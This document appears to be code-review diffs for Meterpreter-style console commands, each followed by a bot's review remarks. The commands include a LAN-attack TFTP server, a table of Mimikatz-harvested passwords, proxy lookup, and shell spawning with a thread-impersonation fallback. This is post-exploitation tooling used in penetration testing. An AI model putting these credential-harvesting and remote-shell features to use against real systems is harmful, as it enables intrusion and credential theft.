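+@@tftp_start_opts.usage + "\n")
+end
+def cmd_tftp_start(*args)
+@@tftp_start_opts.parse(args) { |opt, idx, val|
+case opt
+when '-h'
+print_tftp_start_usage
+return true
+end
+}
+print_status( "Starting TFTP server ..." )
+client.lanattacks.tftp.start
+print_good( "TFTP server startd." )
+end
+@@tftp_stop_opts = Rex::Parser::Arguments.new(
+"-h" => [ false, "Help banner." ])
+def print_tftp_stop_usage
+print("tftp_stop [-h]\n\n" +
+"Stops the currently running TFTP server.\n" +
+@@tftp_stop_opts.usage + "\n")
+end
+def cmd_tftp_stop(*args)
+@@tftp_stop_opts.parse(args) { |opt, idx, val|
+case opt
+when '-h'
+print_tftp_stop_usage
+return true
+end
+}
+print_status( "Stopping TFTP server ..." )
+client.lanattacks.tftp.stop
+print_good( "TFTP server stopped." )
+end
+@@tftp_reset_opts = Rex::Parser::Arguments.new(
+"-h" => [ false, "Help banner." ])
+def print_tftp_reset_usage
+print("tftp_reset [-h]\n\n" +
+"Resets the currently running TFTP server.\n" +
+@@tftp_reset_opts.usage + "\n")
+end
+def cmd_tftp_reset(*args)
+@@tftp_reset_opts.parse(args) { |opt, idx, val|
+case opt
+when '-h'
+print_tftp_reset_usage
+return true
+end
+}
+print_status( "Resetting TFTP server ..." )
+client.lanattacks.tftp.reset
+print_good( "TFTP server reset." )
+end
+@@tftp_add_file_opts = Rex::Parser::Arguments.new(
+"-h" => [ false, "Help banner." ])
+def print_tftp_add_file_usage
+print("tftp_add_file <file> [-h]\n\n" +
+"Add a file to the currently running TFTP server.\n" +
+@@tftp_add_file_opts.usage + "\n")
+end
+def cmd_tftp_add_file(*args)
+@@tftp_add_file_opts.parse(args) { |opt, idx, val|
+case opt
+when '-h'
+print_tftp_add_file_usage
+return true
+end
+}
+name = args.shift
+print_status( "Adding file #{name} ..." )
+client.lanattacks.tftp.add_file(name, ::File.read(name))
+print_good( "File added." )
+end
+end
+end
+end
+end
+end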
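Review bot: `cmd_tftp_add_file` hands `args.shift` straight to `::File.read` with no check that an argument was given or that the path is a readable file, so `tftp_add_file` with no argument fails with a TypeError from `File.read(nil)` instead of printing the usage, and a bad path escapes as an unhandled Errno exception; add `if args.empty? then print_tftp_add_file_usage; return true; end` before `name = args.shift`, and print an error and return when `::File.file?(name)` is false. Since the content is meant to be served byte-for-byte, `::File.binread(name)` is the right call rather than `::File.read`, which may be subject to platform text-mode handling and the default external encoding. The `print_good` string in `cmd_tftp_start` reads `"TFTP server startd."` — `started`.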


@ -106,7 +106,7 @@ class Console::CommandDispatcher::Mimikatz
)
accounts.each do |acc|
table << [acc[:authid], acc[:package], acc[:domain], acc[:user], acc[:password]]
table << [acc[:authid], acc[:package], acc[:domain], acc[:user], (acc[:password] || "").gsub("\n","")]
end
print_line table.to_s
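Review bot: The `gsub("\n","")` on the new table row (assuming the second of the two printed lines is the new side, as the page prints old-then-new) only drops line feeds, so a password value containing `"\r"` or other control characters would still corrupt the table row; `gsub(/[\r\n]/, "")` would at least cover both line terminators. Silently deleting characters from a credential also changes what the operator sees — rendering the value with `inspect` escapes rather than strips, and a one-line comment such as `# strip line terminators so multi-line values don't break the table` would explain the sanitization either way. The enclosing method starts and ends outside the hunk.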


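--- a/[path not shown on page]
+++ b/[path not shown on page]
@@ -62,6 +62,7 @@ class Console::CommandDispatcher::Stdapi::Net
 "portfwd" => "Forward a local port to a remote service",
 "arp" => "Display the host ARP cache",
 "netstat" => "Display the network connections",
+"getproxy" => "Display the current proxy configuration",
 }
 reqs = {
 "ipconfig" => [ "stdapi_net_config_get_interfaces" ],
@@ -78,6 +79,7 @@ class Console::CommandDispatcher::Stdapi::Net
 "portfwd" => [ ],
 "arp" => [ "stdapi_net_config_get_arp_table" ],
 "netstat" => [ "stdapi_net_config_get_netstat" ],
+"getproxy" => [ "stdapi_net_config_get_proxy" ],
 }
 all.delete_if do |cmd, desc|
@@ -414,6 +416,14 @@ class Console::CommandDispatcher::Stdapi::Net
 print @@portfwd_opts.usage
 end
+def cmd_getproxy
+p = client.net.config.get_proxy_config()
+print_line( "Auto-detect : #{p[:autodetect] ? "Yes" : "No"}" )
+print_line( "Auto config URL : #{p[:autoconfigurl]}" )
+print_line( "Proxy URL : #{p[:proxy]}" )
+print_line( "Proxy Bypass : #{p[:proxybypass]}" )
+end
 protected
 #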
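Review bot: `cmd_getproxy` in the third hunk is declared without parameters, unlike every other `cmd_*` method visible in these dispatchers, which take `(*args)`; if the console forwards the user's arguments to the method (as the other commands expect), `getproxy -h` or any stray argument would presumably raise an ArgumentError rather than print a usage line. Declare it `def cmd_getproxy(*args)` and, following the file's pattern, give it a `Rex::Parser::Arguments` with a `-h` option and a `print_getproxy_usage` helper. The `get_proxy_config()` call also carries empty parentheses that the surrounding code omits. A short comment above the method, `# Display the proxy settings reported by the session's stdapi_net_config_get_proxy command`, would tie the method to the capability requirement added in the second hunk.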


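--- a/[path not shown on page]
+++ b/[path not shown on page]
@@ -236,7 +236,15 @@ class Console::CommandDispatcher::Stdapi::Sys
 when /win/
 path = client.fs.file.expand_path("%COMSPEC%")
 path = (path and not path.empty?) ? path : "cmd.exe"
-cmd_execute("-f", path, "-c", "-H", "-i", "-t")
+# attempt the shell with thread impersonation
+begin
+cmd_execute("-f", path, "-c", "-H", "-i", "-t")
+rescue
+# if this fails, then we attempt without impersonation
+print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
+cmd_execute("-f", path, "-c", "-H", "-i")
+end
 when /linux/
 # Don't expand_path() this because it's literal anyway
 path = "/bin/sh"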
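Review bot: The bare `rescue` in the new `begin` block discards the exception from the impersonated attempt, so the operator is told that `-t` failed but never why; capture it with `rescue => e` and report it, `print_error( "Failed to spawn shell with thread impersonation (#{e.class}: #{e.message}). Retrying without it." )`. The fallback is also only reached if `cmd_execute` raises — if it reports failure by printing and returning, the retry never happens, which is worth confirming against `cmd_execute` before relying on this path. Dropping the impersonation silently changes the security context the shell runs in, so the retry message should make that explicit rather than only saying it is retrying. The enclosing method's `case` statement starts and ends outside the hunk.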
